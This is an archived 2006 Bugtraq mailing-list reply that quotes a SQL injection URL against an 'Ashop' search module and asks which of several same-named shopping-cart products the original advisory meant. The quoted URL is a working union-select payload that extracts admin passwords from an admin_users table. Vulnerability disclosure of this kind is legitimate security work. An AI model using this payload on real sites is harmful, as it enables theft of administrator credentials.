[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.64.0607251833450.16075@forced.attrition.org>
Date: Tue, 25 Jul 2006 18:35:13 -0400 (EDT)
From: security curmudgeon <jericho@...rition.org>
To: entrika_fs@...oo.com
Cc: bugtraq@...urityfocus.com
Subject: Re: Ashop Search Module SQL injection
On Tue, 13 Jun 2006, entrika_fs@...oo.com wrote:
: http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2Cadmin_password%2C3%2C4+from+admin_users+%27+&cmdSearch=Search
:
: credits: EntriKa & The_BeKiR & erne
Which "Ashop" is this?
AShop Software
www.ashopsoftware.com/
Ashop Shopping Cart Software
www.ashop.com.au/
ASHOP
www.ashop.com.hk/
Ashop
www.ashop.co.il/
Ashop
www.ashop.at/
ashop.co.uk
www.ashop.co.uk/
[..]
Something else?
Powered by blists - more mailing lists